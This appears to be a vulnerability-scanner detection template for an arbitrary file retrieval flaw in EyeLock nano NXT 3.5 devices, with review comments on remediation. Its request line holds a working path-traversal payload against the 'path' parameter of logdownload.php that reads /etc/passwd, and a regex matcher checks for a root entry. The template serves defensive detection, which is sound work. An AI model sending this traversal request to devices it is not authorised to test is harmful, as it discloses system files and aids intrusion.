# Detection template: reports EyeLock nano NXT devices whose
# logdownload.php returns a file selected by the request's 'path' parameter.
id: eyelock-nano-lfd

info:
  name: EyeLock nano NXT 3.5 - Arbitrary File Retrieval
  author: geeknik
  severity: high
  # Root cause as stated below: 'path' is not verified before it is used to
  # read a file, so the script can be pointed at files other than its logs.
  # NOTE(review): this page names no fixed version; confirm remediation
  # against the referenced advisory, and until then limit which networks can
  # reach the device's web interface.
  description: >-
    EyeLock nano NXT suffers from a file retrieval vulnerability when input
    passed through the 'path' parameter to 'logdownload.php' script is not
    properly verified before being used to read files. This can be exploited
    to disclose contents of files from local resources.
  reference:
    - https://www.zeroscience.mk/codes/eyelock_lfd.txt
  tags: iot,lfi,eyelock
  metadata:
    # One path entry below, so one request per target.
    max-request: 1

http:
  - method: GET
    path:
      - '{{BaseURL}}/scripts/logdownload.php?dlfilename=juicyinfo.txt&path=../../../../../../../../etc/passwd'

    # Both matchers must hold: a 200 without passwd content, or passwd-like
    # text on a non-200 response, is not reported.
    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200

      # Matches a passwd-style root entry in the response body: password
      # field 'x' or '*', followed by uid 0 and gid 0.
      - type: regex
        part: body
        regex:
          - 'root:[x*]:0:0:'